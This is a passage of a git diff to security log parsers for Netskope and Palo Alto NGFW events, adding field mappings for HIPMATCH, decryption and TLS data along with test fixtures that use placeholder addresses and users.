2024\",\"src_timezone\":\"Europe/Paris\",\"src_zipcode\":\"75018\",\"srcip\":\"5.6.7.8\",\"telemetry_app\":\"\",\"timestamp\":1731574892,\"traffic_type\":\"CloudApp\",\"transaction_id\":111111111111,\"type\":\"nspolicy\",\"ur_normalized\":\"john.doe@mail.fr\",\"url\":\"test.example.com\",\"user\":\"john.doe@mail.fr\",\"useragent\":\"Chrome\",\"userip\":\"10.20.30.40\",\"userkey\":\"john.doe@mail.fr\",\"log_file_name\":\"\",\"from_user\":\"\",\"ext_labels\":[],\"audit_type\":\"\",\"CononicalName\":\"\",\"parent_id\":\"\",\"tss_scan_failed\":\"\",\"data_center\":\"\",\"from_user_category\":\"\",\"internal_collaborator_count\":0,\"dlp_rule_severity\":\"\",\"req_cnt\":0,\"dlp_parent_id\":0,\"alert_type\":\"\",\"workspace\":\"\",\"dst_geoip_src\":0,\"user_category\":\"\",\"channel_id\":\"\",\"loginurl\":\"\",\"dlp_is_unique_count\":\"\",\"netskope_activity\":\"\",\"retro_scan_name\":\"\",\"to_user\":\"\",\"sha256\":\"\",\"justification_type\":\"\",\"fromlogs\":\"\",\"title\":\"\",\"universal_connector\":\"\",\"custom_connector\":\"\",\"modified\":0,\"user_confidence_index\":0,\"exposure\":\"\",\"orignal_file_path\":\"\",\"instance_id\":\"\",\"managementID\":\"\",\"sanctioned_instance\":\"\",\"file_lang\":\"\",\"dlp_scan_failed\":\"\",\"mime_type\":\"\",\"browser_version\":\"\",\"object_id\":\"\",\"data_type\":\"\",\"audit_category\":\"\",\"dlp_mail_parent_id\":\"\",\"file_path\":\"\",\"sAMAccountName\":\"\",\"client_bytes\":0,\"dlp_file\":\"\",\"org\":\"\",\"numbytes\":0,\"tss_fail_reason\":\"\",\"object\":\"\",\"nsdeviceuid\":\"\",\"app_activity\":\"\",\"instance\":\"\",\"userPrincipalName\":\"\",\"object_type\":\"\",\"scan_type\":\"\",\"appsuite\":\"\",\"conn_duration\":0,\"file_type\":\"\",\"dsthost\":\"\",\"logintype\":\"\",\"true_obj_type\":\"\",\"dlp_rule\":\"\",\"serial\":\"\",\"suppression_key\":\"\",\"suppression_start_time\":0,\"dlp_rule_count\":0,\"shared_with\":\"\",\"resp_cnt\":0,\"justification_reason\":\"\",\"web_universal_connector\":\"\",\"server_bytes\":0,\"dlp_unique_count\":0,\"md5\":\"\",\"file_size\":0,\"smtp_to\":[],\"dlp_incident_id\":0,\"true_obj_category\":\"\",\"src_geoip_src\":0,\"total_collaborator_count\":0,\"sessionid\":\"\",\"user_id\":\"\",\"custom_attr\":{},\"referer\":\"\",\"suppression_end_time\":0,\"owner\":\"\",\"tss_mode\":\"\",\"dlp_fail_reason\":\"\",\"workspace_id\":\"\",\"dlp_profile\":\"\"}", + "event": { + "action": "Browse", + "category": [ + "network" + ], + "dataset": "nspolicy", + "duration": 0, + "kind": "alert", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-14T09:01:32Z", + "action": { + "name": "block" + }, + "destination": { + "address": "1.2.3.4", + "bytes": 0, + "geo": { + "city_name": "San Francisco", + "country_iso_code": "US", + "location": { + "lat": 37.775699615478516, + "lon": -122.39520263671875 + }, + "postal_code": "N/A", + "region_name": "California", + "timezone": "America/Los_Angeles" + }, + "ip": "1.2.3.4" + }, + "host": { + "name": "PC-HOST01", + "os": { + "name": "Windows 11", + "platform": "windows", + "type": "windows", + "version": "Windows NT 11.0" + } + }, + "netskope": { + "events": { + "access_method": "Client", + "application": { + "category": "General", + "name": "DNS Over HTTPS" + }, + "ccl": "unknown" + } + }, + "network": { + "bytes": 0 + }, + "observer": { + "vendor": "Netskope" + }, + "related": { + "ip": [ + "1.2.3.4", + "5.6.7.8" + ], + "user": [ + "john.doe" + ] + }, + "rule": { + "id": "99999999999999999999999999999999 2024-10-30 13:52:18.401518", + "name": "Block DoH - incompatibility with Netskope" + }, + "source": { + "address": "5.6.7.8", + "bytes": 0, + "geo": { + "city_name": "Paris", + "country_iso_code": "FR", + "location": { + "lat": 48.8323, + "lon": 2.4075 + }, + "postal_code": "75018", + "region_name": "\u00cele-de-France", + "timezone": "Europe/Paris" + }, + "ip": "5.6.7.8" + }, + "url": { + "original": "test.example.com", + "path": "test.example.com" + }, + "user": { + "domain": "mail.fr", + "email": "john.doe@mail.fr", + "name": "john.doe" + }, + "user_agent": { + "name": "Chrome" + } + } +} \ No newline at end of file diff --git a/Netskope/netskope_events/tests/test_nspolicy_log.json b/Netskope/netskope_events/tests/test_nspolicy_log.json index 25513a172..412ece514 100644 --- a/Netskope/netskope_events/tests/test_nspolicy_log.json +++ b/Netskope/netskope_events/tests/test_nspolicy_log.json @@ -17,6 +17,9 @@ ] }, "@timestamp": "2022-12-21T15:52:00Z", + "action": { + "name": "Allow" + }, "cloud": { "instance": { "id": "Example" @@ -43,7 +46,8 @@ "md5": "68b329da9893e34099c7d8ad5cb9c940" }, "mime_type": "image/gif", - "name": "giphy2.gif" + "name": "giphy2.gif", + "size": 204299 }, "host": { "name": "TEST-1111111", diff --git a/Netskope/netskope_events/tests/test_nspolicy_upload.json b/Netskope/netskope_events/tests/test_nspolicy_upload.json new file mode 100644 index 000000000..314e7d7e1 --- /dev/null +++ b/Netskope/netskope_events/tests/test_nspolicy_upload.json @@ -0,0 +1,123 @@ +{ + "input": { + "message": "{\"_id\":\"2d7a3c19cf913179146454b6\",\"access_method\":\"Client\",\"activity\":\"Upload\",\"alert\":\"no\",\"app\":\"App\",\"app_session_id\":1234567890,\"appcategory\":\"Remote Access\",\"browser\":\"CHROME\",\"browser_session_id\":1111111111111111111,\"browser_version\":\"6.0;\",\"category\":\"Remote Access\",\"cci\":73,\"ccl\":\"medium\",\"connection_id\":0,\"count\":1,\"data_type\":\"application/octet-stream\",\"device\":\"Windows Device\",\"device_classification\":\"managed\",\"dst_country\":\"CZ\",\"dst_latitude\":50.0883,\"dst_location\":\"Prague\",\"dst_longitude\":14.4124,\"dst_region\":\"Prague\",\"dst_timezone\":\"Europe/Prague\",\"dst_zipcode\":\"110 00\",\"dstip\":\"1.2.3.4\",\"dstport\":80,\"file_size\":24,\"file_type\":\"File Type Not Detected\",\"hostname\":\"PC-HOST01\",\"ja3\":\"NotAvailable\",\"ja3s\":\"NotAvailable\",\"managed_app\":\"no\",\"md5\":\"68b329da9893e34099c7d8ad5cb9c940\",\"netskope_pop\":\"FR-PAR3\",\"object\":\"object.txt\",\"object_type\":\"File\",\"organization_unit\":\"\",\"os\":\"Windows 10\",\"os_version\":\"Windows NT 10.0\",\"other_categories\":[\"Remote Access\"],\"page\":\"test.example.com\",\"page_site\":\"app\",\"policy_id\":\"22222222222222222222222222222222 2024-10-30 13:52:18.401518\",\"protocol\":\"HTTPS/1.1\",\"request_id\":4444444444444444444,\"severity\":\"unknown\",\"site\":\"App\",\"src_country\":\"FR\",\"src_latitude\":48.6673,\"src_location\":\"Paris\",\"src_longitude\":2.3476,\"src_region\":\"\u00cele-de-France\",\"src_time\":\"Thu Nov 14 10:04:00 2024\",\"src_timezone\":\"Europe/Paris\",\"src_zipcode\":\"75001\",\"srcip\":\"5.6.7.8\",\"telemetry_app\":\"\",\"timestamp\":1731575086,\"traffic_type\":\"CloudApp\",\"transaction_id\":5555555555555555555,\"type\":\"nspolicy\",\"universal_connector\":\"yes\",\"ur_normalized\":\"jdoe@mail.com\",\"url\":\"url.app.com/object2.txt\",\"user\":\"JDOE@mail.com\",\"useragent\":\"Mozilla/4.0 (compatible; CHROME 6.0; DynGate)\",\"userip\":\"10.20.30.40\",\"userkey\":\"JDOE@mail.com\",\"serial\":\"\",\"numbytes\":0,\"exposure\":\"\",\"server_bytes\":0,\"web_universal_connector\":\"\",\"logintype\":\"\",\"alert_type\":\"\",\"from_user\":\"\",\"dlp_scan_failed\":\"\",\"dlp_rule\":\"\",\"fromlogs\":\"\",\"justification_type\":\"\",\"tss_mode\":\"\",\"user_category\":\"\",\"src_geoip_src\":0,\"CononicalName\":\"\",\"shared_with\":\"\",\"channel_id\":\"\",\"dlp_mail_parent_id\":\"\",\"custom_attr\":{},\"sha256\":\"\",\"resp_cnt\":0,\"custom_connector\":\"\",\"orignal_file_path\":\"\",\"to_user\":\"\",\"internal_collaborator_count\":0,\"owner\":\"\",\"appsuite\":\"\",\"org\":\"\",\"dsthost\":\"\",\"tss_fail_reason\":\"\",\"audit_type\":\"\",\"parent_id\":\"\",\"data_center\":\"\",\"loginurl\":\"\",\"mime_type\":\"\",\"from_user_category\":\"\",\"file_path\":\"\",\"modified\":0,\"referer\":\"\",\"dlp_profile\":\"\",\"object_id\":\"\",\"true_obj_type\":\"\",\"tss_scan_failed\":\"\",\"managementID\":\"\",\"dst_geoip_src\":0,\"dlp_rule_severity\":\"\",\"conn_duration\":0,\"policy\":\"\",\"netskope_activity\":\"\",\"audit_category\":\"\",\"smtp_to\":[],\"nsdeviceuid\":\"\",\"justification_reason\":\"\",\"suppression_start_time\":0,\"dlp_is_unique_count\":\"\",\"dlp_parent_id\":0,\"dlp_fail_reason\":\"\",\"userPrincipalName\":\"\",\"dlp_file\":\"\",\"dlp_incident_id\":0,\"sanctioned_instance\":\"\",\"suppression_key\":\"\",\"retro_scan_name\":\"\",\"instance_id\":\"\",\"true_obj_category\":\"\",\"action\":\"\",\"sessionid\":\"\",\"file_lang\":\"\",\"log_file_name\":\"\",\"notify_template\":\"\",\"sAMAccountName\":\"\",\"ext_labels\":[],\"instance\":\"\",\"user_id\":\"\",\"workspace\":\"\",\"dlp_rule_count\":0,\"app_activity\":\"\",\"suppression_end_time\":0,\"title\":\"\",\"scan_type\":\"\",\"dlp_unique_count\":0,\"total_collaborator_count\":0,\"client_bytes\":0,\"req_cnt\":0,\"user_confidence_index\":0,\"workspace_id\":\"\"}", + "sekoiaio": { + "intake": { + "dialect": "Netskope", + "dialect_uuid": "de9ca004-991e-4f5c-89c5-e075f3fb3216" + } + } + }, + "expected": { + "message": "{\"_id\":\"2d7a3c19cf913179146454b6\",\"access_method\":\"Client\",\"activity\":\"Upload\",\"alert\":\"no\",\"app\":\"App\",\"app_session_id\":1234567890,\"appcategory\":\"Remote Access\",\"browser\":\"CHROME\",\"browser_session_id\":1111111111111111111,\"browser_version\":\"6.0;\",\"category\":\"Remote Access\",\"cci\":73,\"ccl\":\"medium\",\"connection_id\":0,\"count\":1,\"data_type\":\"application/octet-stream\",\"device\":\"Windows Device\",\"device_classification\":\"managed\",\"dst_country\":\"CZ\",\"dst_latitude\":50.0883,\"dst_location\":\"Prague\",\"dst_longitude\":14.4124,\"dst_region\":\"Prague\",\"dst_timezone\":\"Europe/Prague\",\"dst_zipcode\":\"110 00\",\"dstip\":\"1.2.3.4\",\"dstport\":80,\"file_size\":24,\"file_type\":\"File Type Not Detected\",\"hostname\":\"PC-HOST01\",\"ja3\":\"NotAvailable\",\"ja3s\":\"NotAvailable\",\"managed_app\":\"no\",\"md5\":\"68b329da9893e34099c7d8ad5cb9c940\",\"netskope_pop\":\"FR-PAR3\",\"object\":\"object.txt\",\"object_type\":\"File\",\"organization_unit\":\"\",\"os\":\"Windows 10\",\"os_version\":\"Windows NT 10.0\",\"other_categories\":[\"Remote Access\"],\"page\":\"test.example.com\",\"page_site\":\"app\",\"policy_id\":\"22222222222222222222222222222222 2024-10-30 13:52:18.401518\",\"protocol\":\"HTTPS/1.1\",\"request_id\":4444444444444444444,\"severity\":\"unknown\",\"site\":\"App\",\"src_country\":\"FR\",\"src_latitude\":48.6673,\"src_location\":\"Paris\",\"src_longitude\":2.3476,\"src_region\":\"\u00cele-de-France\",\"src_time\":\"Thu Nov 14 10:04:00 2024\",\"src_timezone\":\"Europe/Paris\",\"src_zipcode\":\"75001\",\"srcip\":\"5.6.7.8\",\"telemetry_app\":\"\",\"timestamp\":1731575086,\"traffic_type\":\"CloudApp\",\"transaction_id\":5555555555555555555,\"type\":\"nspolicy\",\"universal_connector\":\"yes\",\"ur_normalized\":\"jdoe@mail.com\",\"url\":\"url.app.com/object2.txt\",\"user\":\"JDOE@mail.com\",\"useragent\":\"Mozilla/4.0 (compatible; CHROME 6.0; DynGate)\",\"userip\":\"10.20.30.40\",\"userkey\":\"JDOE@mail.com\",\"serial\":\"\",\"numbytes\":0,\"exposure\":\"\",\"server_bytes\":0,\"web_universal_connector\":\"\",\"logintype\":\"\",\"alert_type\":\"\",\"from_user\":\"\",\"dlp_scan_failed\":\"\",\"dlp_rule\":\"\",\"fromlogs\":\"\",\"justification_type\":\"\",\"tss_mode\":\"\",\"user_category\":\"\",\"src_geoip_src\":0,\"CononicalName\":\"\",\"shared_with\":\"\",\"channel_id\":\"\",\"dlp_mail_parent_id\":\"\",\"custom_attr\":{},\"sha256\":\"\",\"resp_cnt\":0,\"custom_connector\":\"\",\"orignal_file_path\":\"\",\"to_user\":\"\",\"internal_collaborator_count\":0,\"owner\":\"\",\"appsuite\":\"\",\"org\":\"\",\"dsthost\":\"\",\"tss_fail_reason\":\"\",\"audit_type\":\"\",\"parent_id\":\"\",\"data_center\":\"\",\"loginurl\":\"\",\"mime_type\":\"\",\"from_user_category\":\"\",\"file_path\":\"\",\"modified\":0,\"referer\":\"\",\"dlp_profile\":\"\",\"object_id\":\"\",\"true_obj_type\":\"\",\"tss_scan_failed\":\"\",\"managementID\":\"\",\"dst_geoip_src\":0,\"dlp_rule_severity\":\"\",\"conn_duration\":0,\"policy\":\"\",\"netskope_activity\":\"\",\"audit_category\":\"\",\"smtp_to\":[],\"nsdeviceuid\":\"\",\"justification_reason\":\"\",\"suppression_start_time\":0,\"dlp_is_unique_count\":\"\",\"dlp_parent_id\":0,\"dlp_fail_reason\":\"\",\"userPrincipalName\":\"\",\"dlp_file\":\"\",\"dlp_incident_id\":0,\"sanctioned_instance\":\"\",\"suppression_key\":\"\",\"retro_scan_name\":\"\",\"instance_id\":\"\",\"true_obj_category\":\"\",\"action\":\"\",\"sessionid\":\"\",\"file_lang\":\"\",\"log_file_name\":\"\",\"notify_template\":\"\",\"sAMAccountName\":\"\",\"ext_labels\":[],\"instance\":\"\",\"user_id\":\"\",\"workspace\":\"\",\"dlp_rule_count\":0,\"app_activity\":\"\",\"suppression_end_time\":0,\"title\":\"\",\"scan_type\":\"\",\"dlp_unique_count\":0,\"total_collaborator_count\":0,\"client_bytes\":0,\"req_cnt\":0,\"user_confidence_index\":0,\"workspace_id\":\"\"}", + "event": { + "action": "Upload", + "category": [ + "network" + ], + "dataset": "nspolicy", + "duration": 0, + "kind": "event", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-14T09:04:46Z", + "action": { + "name": "Allow" + }, + "destination": { + "address": "1.2.3.4", + "bytes": 0, + "geo": { + "city_name": "Prague", + "country_iso_code": "CZ", + "location": { + "lat": 50.0883, + "lon": 14.4124 + }, + "postal_code": "110 00", + "region_name": "Prague", + "timezone": "Europe/Prague" + }, + "ip": "1.2.3.4" + }, + "file": { + "hash": { + "md5": "68b329da9893e34099c7d8ad5cb9c940" + }, + "mime_type": "File Type Not Detected", + "name": "object.txt", + "size": 24 + }, + "host": { + "name": "PC-HOST01", + "os": { + "name": "Windows 10", + "platform": "windows", + "type": "windows", + "version": "Windows NT 10.0" + } + }, + "netskope": { + "events": { + "access_method": "Client", + "application": { + "category": "Remote Access", + "name": "App" + }, + "ccl": "medium" + } + }, + "network": { + "bytes": 0 + }, + "observer": { + "vendor": "Netskope" + }, + "related": { + "hash": [ + "68b329da9893e34099c7d8ad5cb9c940" + ], + "ip": [ + "1.2.3.4", + "5.6.7.8" + ], + "user": [ + "JDOE" + ] + }, + "rule": { + "id": "22222222222222222222222222222222 2024-10-30 13:52:18.401518" + }, + "source": { + "address": "5.6.7.8", + "bytes": 0, + "geo": { + "city_name": "Paris", + "country_iso_code": "FR", + "location": { + "lat": 48.6673, + "lon": 2.3476 + }, + "postal_code": "75001", + "region_name": "\u00cele-de-France", + "timezone": "Europe/Paris" + }, + "ip": "5.6.7.8" + }, + "url": { + "original": "url.app.com/object2.txt", + "path": "url.app.com/object2.txt" + }, + "user": { + "domain": "mail.com", + "email": "JDOE@mail.com", + "name": "JDOE" + }, + "user_agent": { + "name": "CHROME", + "version": "6.0;" + } + } +} \ No newline at end of file diff --git a/Netskope/netskope_events/tests/test_user_alert.json b/Netskope/netskope_events/tests/test_user_alert.json index a882c2ac5..bb5831a9c 100644 --- a/Netskope/netskope_events/tests/test_user_alert.json +++ b/Netskope/netskope_events/tests/test_user_alert.json @@ -17,6 +17,9 @@ ] }, "@timestamp": "2022-12-21T14:52:01Z", + "action": { + "name": "useralert" + }, "destination": { "address": "108.128.91.183", "bytes": 0, diff --git a/Palo Alto Networks/paloalto-ngfw/_meta/fields.yml b/Palo Alto Networks/paloalto-ngfw/_meta/fields.yml index e42125a42..4b07b6065 100644 --- a/Palo Alto Networks/paloalto-ngfw/_meta/fields.yml +++ b/Palo Alto Networks/paloalto-ngfw/_meta/fields.yml @@ -318,7 +318,22 @@ paloalto.threat.type: name: paloalto.threat.type type: keyword +paloalto.tls.chain_status: + description: The trust in the TLS chain + name: paloalto.tls.chain_status + type: keyword + +paloalto.tls.root_status: + description: The trust in the root certificate + name: paloalto.tls.root_status + type: keyword + +paloalto.tls.sni: + description: The server name indication + name: paloalto.tls.sni + type: keyword + paloalto.vsys: - description: The virtual system + description: the virtual system name: paloalto.vsys type: keyword diff --git a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml index 2f8b22f2a..944713355 100644 --- a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml +++ b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml @@ -142,7 +142,7 @@ pipeline: input_field: original.message output_field: message columnnames: - - FUTURE_USER + - PaloAltoDomain - ReceiveTime - DeviceSN - Type @@ -187,12 +187,12 @@ pipeline: input_field: original.message output_field: message columnnames: - - FUTURE_USE + - PaloAltoDomain - ReceiveTime - DeviceSN - Type - Subtype - - FUTURE_USE + - ConfigVersion - GeneratedTime - VirtualLocation - EventID @@ -382,6 +382,167 @@ pipeline: - HighResolutionTimestamp delimiter: "," + # HIPMATCH CSV + - name: parsed_event + filter: "{{parsed_dsv.message.Type == 'HIPMATCH'}}" + external: + name: dsv.parse-dsv + properties: + input_field: original.message + output_field: message + columnnames: + - PaloAltoDomain + - ReceiveTime + - DeviceSN + - Type + - Subtype + - ConfigVersion + - GenerateTime + - SourceUser + - VirtualLocation + - MachineName + - EndpointOSType + - SourceAddress + - HipMatchName + - RepeatCount + - HIPMatchType + - FUTURE_USE + - FUTURE_USE + - SequenceNumber + - ActionFlags + - DGHierarchyLevel1 + - DGHierarchyLevel2 + - DGHierarchyLevel3 + - DGHierarchyLevel4 + - VirtualSystemName + - DeviceName + - VirtualSystemID + - SourceIPv6 + - HostID + - EndpointSerialNumber + - SourceDeviceMac + - HighResolutionTimestamp + - ClusterName + delimiter: "," + + # DECRYPTION CSV + - name: parsed_event + filter: "{{parsed_dsv.message.Type == 'DECRYPTION'}}" + external: + name: dsv.parse-dsv + properties: + input_field: original.message + output_field: message + columnnames: + - PaloAltoDomain + - ReceiveTime + - DeviceSN + - Type + - Subtype + - ConfigVersion + - GenerateTime + - SourceAddress + - DestinationAddress + - NATSourceIP + - NATDestinationIP + - Rule + - SourceUser + - DestinationUser + - Application + - VirtualLocation + - SourceZone + - DestinationZone + - InboundInterface + - OutboundInterface + - LogAction + - TimeLogged + - SessionID + - RepeatCount + - SourcePort + - DestinationPort + - NATSourcePort + - NATDestinationPort + - Flags + - IPProtocol + - Action + - Tunnel + - FUTURE_USE + - FUTURE_USE + - SourceVMUUID + - DestinationVMUUID + - UUIDforrule + - StageforClienttoFirewall + - StageforFirewalltoServer + - TLSVersion + - TLSKeyExchange + - TLSEncryptionAlgorithm + - TLS_AUTH + - PolicyName + - EllipticCurve + - ErrorIndex + - RootStatus + - ChainStatus + - ProxyType + - CertificateSerialNumber + - Fingerprint + - CertificateStartDate + - CertificateEndDate + - CertificateVersion + - CertificateSize + - CommonNameLength + - IssuerCommonNameLength + - RootCommonNameLength + - SNILength + - CertificateFlags + - SubjectCommonName + - IssuerSubjectCommonName + - RootSubjectCommonName + - ServerNameIndication + - Error + - ContainerID + - PODNamespace + - PODName + - SourceExternalDynamicList + - DestinationExternalDynamicList + - SourceDynamicAddressGroup + - DestinationDynamicAddressGroup + - HighResTimestamp + - SourceDeviceCategory + - SourceDeviceProfile + - SourceDeviceModel + - SourceDeviceVendor + - SourceDeviceOSFamily + - SourceDeviceOSVersion + - SourceHostname + - SourceMACAddress + - DestinationDeviceCategory + - DestinationDeviceProfile + - DestinationDeviceModel + - DestinationDeviceVendor + - DestinationDeviceOSFamily + - DestinationDeviceOSVersion + - DestinationHostname + - DestinationMACAddress + - SequenceNumber + - ActionFlags + - DGHierarchyLevel1 + - DGHierarchyLevel2 + - DGHierarchyLevel3 + - DGHierarchyLevel4 + - VirtualSystemName + - DeviceName + - VirtualSystemID + - ApplicationSubcategory + - ApplicationCategory + - ApplicationTechnology + - ApplicationRisk + - ApplicationCharacteristic + - ApplicationContainer + - ApplicationSaaS + - ApplicationSanctionedState + - ClusterName + delimiter: "," + - name: parsed_timestamp external: name: date.parse @@ -592,7 +753,7 @@ stages: event.module: "{{parsed_description.message.module}}" host.hostname: "{{parsed_event.message.dvchost or parsed_event.message.PanOSEndpointDeviceName}}" host.name: "{{parsed_event.message.dvchost or parsed_event.message.PanOSEndpointDeviceName or parsed_event.message.LogSourceName or parsed_event.message.MachineName or parsed_event.message.shost or parsed_event.message.EndpointDeviceName or parsed_event.message.SourceDeviceHost or parsed_description.message.hostname}}" - host.id: "{{parsed_event.message.deviceExternalId}}" + host.id: "{{parsed_event.message.deviceExternalId or parsed_event.message.HostID}}" host.mac: "{{parsed_event.message.PanOSSourceDeviceMac or parsed_event.message.SourceDeviceMac}}" host.os.family: "{{parsed_event.message.PanOSSourceDeviceOSFamily}}" host.os.version: "{{parsed_event.message.PanOSSourceDeviceOSVersion or parsed_event.message.ClientOSVersion or parsed_event.message.SourceDeviceOSVersion}}" @@ -608,6 +769,13 @@ stages: network.transport: "{{parsed_event.message.IPProtocol or parsed_event.message.proto}}" network.protocol: "{{parsed_description.message.proto}}" network.type: "{{parsed_event.message.TunnelType or parsed_event.message.PanOSTunnelType}}" + tls.version: "{{parsed_event.message.TLSVersion[3:]}}" + tls.cipher: "TLS_{{parsed_event.message.TLSKeyExchange}}_{{parsed_event.message.TLSEncryptionAlgorithm}}_{{parsed_event.message.message.TLS_AUTH}}" + tls.curve: "{{parsed_event.message.EllipticCurve}}" + tls.server.x509.issuer.common_name: "{{parsed_event.message.IssuerCommonName}}" + tls.server.x509.subject.common_name: "{{parsed_event.message.SubjectCommonName}}" + tls.server.x509.serial_number: "{{parsed_event.message.CertificateSerialNumber}}" + tls.server.hash.sha256: "{{parsed_event.message.Fingerprint}}" observer.egress.interface.alias: "{{parsed_event.message.ToZone or parsed_event.message.cs5}}" observer.ingress.interface.alias: "{{parsed_event.message.FromZone or parsed_event.message.cs4}}" observer.ingress.interface.name: "{{parsed_description.message.intf}}" @@ -617,7 +785,7 @@ stages: observer.version: "{{parsed_event.message.DeviceVersion or parsed_event.message.GlobalProtectClientVersion}}" observer.serial_number: "{{parsed_event.message.DeviceSN}}" observer.name: "{{parsed_event.message.DeviceName}}" - rule.name: "{{parsed_event.message.Rule}}" + rule.name: "{{parsed_event.message.Rule or parsed_event.message.HipMatchName}}" rule.uuid: "{{parsed_event.message.PanOSRuleUUID or parsed_event.message.RuleUUID}}" source.bytes: "{{parsed_event.message.BytesSent or parsed_event.message.in}}" @@ -752,6 +920,9 @@ stages: paloalto.vsys: "{{parsed_description.message.vsys}}" paloalto.authetification.profile: "{{parsed_description.message.auth_profile}}" paloalto.server.profile: "{{parsed_description.message.server_profile}}" + paloalto.tls.chain_status: "{{parsed_event.message.ChainStatus}}" + paloalto.tls.root_status: "{{parsed_event.message.RootStatus}}" + paloalto.tls.sni: "{{parsed_event.message.ServerNameIndication}}" - set: paloalto.threat.type: > {%- set id = parsed_threat.message.threat_code | int -%} @@ -810,8 +981,8 @@ stages: user.name: '{{final.user.name.split("\\") | last}}' filter: '{{final.user.name != null and "\\" in final.user.name}}' - set: - user.domain: '{{final.user.email.split("@") | first}}' - user.name: '{{final.user.email.split("@") | last}}' + user.domain: '{{final.user.email.split("@") | last}}' + user.name: '{{final.user.email.split("@") | first}}' filter: '{{final.user.email != null and "@" in final.user.email}}' - set: source.user.domain: '{{final.source.user.name.split("\\") | first}}' diff --git a/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv.json index 65f2b6940..127226ee3 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv.json @@ -21,6 +21,7 @@ "type": "0" }, "host": { + "id": "aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeee", "name": "AAAABBBBB", "os": { "version": "Microsoft Windows 10 Pro , 64-bit" diff --git a/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv_2.json b/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv_2.json index e4b1d5fab..1d68c400c 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv_2.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv_2.json @@ -21,6 +21,7 @@ "type": "0" }, "host": { + "id": "8f0fd1d3-5d3b-49c3-9bee-247ff89a52f3", "name": "2021-02707", "os": { "version": "Microsoft Windows 10 Enterprise , 64-bit" diff --git a/Palo Alto Networks/paloalto-ngfw/tests/network_threat_alert_2.json b/Palo Alto Networks/paloalto-ngfw/tests/network_threat_alert_2.json index e8c257c69..f1e6cf2ad 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/network_threat_alert_2.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/network_threat_alert_2.json @@ -84,7 +84,7 @@ "8.7.6.5" ], "user": [ - "example.org", + "jdoe", "jdoe@example.org" ] }, @@ -117,9 +117,9 @@ "top_level_domain": "com" }, "user": { - "domain": "jdoe", + "domain": "example.org", "email": "jdoe@example.org", - "name": "example.org" + "name": "jdoe" }, "user_agent": { "name": "Microsoft NCSI" diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_decryption_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/test_decryption_csv.json new file mode 100644 index 000000000..6a413f53b --- /dev/null +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_decryption_csv.json @@ -0,0 +1,98 @@ +{ + "input": { + "message": "1,2024/11/03 19:09:43,111111111111,DECRYPTION,0,2562,2024/11/03 19:09:43,1.2.3.4,5.6.7.8,4.3.2.1,8.7.6.5,URL Filtering - Chrome Profile,jdoe,,ssl,vsys1,VPN-SSL,INTERNET,tunnel.16,ae2.1111,Forward-Syslog,2024/11/03 19:09:43,2020391,1,55107,443,22814,443,0x400400,tcp,allow,N/A,,,,,25185364-4f1b-46b5-a376-a96a9438d665,Unknown,Unknown,TLS1.3,ECDHE,AES_256_GCM,SHA384,NoDecrypt-rule,,None,uninspected,Uninspected,No Decrypt,,,,,V1,0,0,0,0,0,:::::NONE,,,,,,,,,,,,,2024-11-03T19:09:43.654+01:00,,,,,,,,,,,,,,,,,1111111111111111111,0x8000000000000000,53,0,0,0,,NFW-OUT-DCA,1,encrypted-tunnel,networking,browser-based,4,\"used-by-malware,able-to-transfer-file,has-known-vulnerability,tunnel-other-application,pervasive-use\",,ssl,no,no\n", + "sekoiaio": { + "intake": { + "dialect": "Palo Alto NGFW", + "dialect_uuid": "903ec1b8-f206-4ba5-8563-db21da09cafd" + } + } + }, + "expected": { + "message": "1,2024/11/03 19:09:43,111111111111,DECRYPTION,0,2562,2024/11/03 19:09:43,1.2.3.4,5.6.7.8,4.3.2.1,8.7.6.5,URL Filtering - Chrome Profile,jdoe,,ssl,vsys1,VPN-SSL,INTERNET,tunnel.16,ae2.1111,Forward-Syslog,2024/11/03 19:09:43,2020391,1,55107,443,22814,443,0x400400,tcp,allow,N/A,,,,,25185364-4f1b-46b5-a376-a96a9438d665,Unknown,Unknown,TLS1.3,ECDHE,AES_256_GCM,SHA384,NoDecrypt-rule,,None,uninspected,Uninspected,No Decrypt,,,,,V1,0,0,0,0,0,:::::NONE,,,,,,,,,,,,,2024-11-03T19:09:43.654+01:00,,,,,,,,,,,,,,,,,1111111111111111111,0x8000000000000000,53,0,0,0,,NFW-OUT-DCA,1,encrypted-tunnel,networking,browser-based,4,\"used-by-malware,able-to-transfer-file,has-known-vulnerability,tunnel-other-application,pervasive-use\",,ssl,no,no\n", + "event": { + "action": "allow", + "category": [ + "network" + ], + "dataset": "decryption", + "outcome": "success", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-03T19:09:43Z", + "action": { + "name": "allow", + "outcome": "success", + "type": "0" + }, + "destination": { + "address": "5.6.7.8", + "ip": "5.6.7.8", + "nat": { + "ip": "8.7.6.5", + "port": 443 + }, + "port": 443 + }, + "log": { + "hostname": "NFW-OUT-DCA", + "logger": "decryption" + }, + "network": { + "application": "ssl", + "transport": "tcp" + }, + "observer": { + "name": "NFW-OUT-DCA", + "product": "PAN-OS", + "serial_number": "111111111111" + }, + "paloalto": { + "DGHierarchyLevel1": "53", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", + "Threat_ContentType": "0", + "VirtualLocation": "vsys1", + "VirtualSystemID": "1", + "tls": { + "chain_status": "Uninspected", + "root_status": "uninspected" + } + }, + "related": { + "ip": [ + "1.2.3.4", + "4.3.2.1", + "5.6.7.8", + 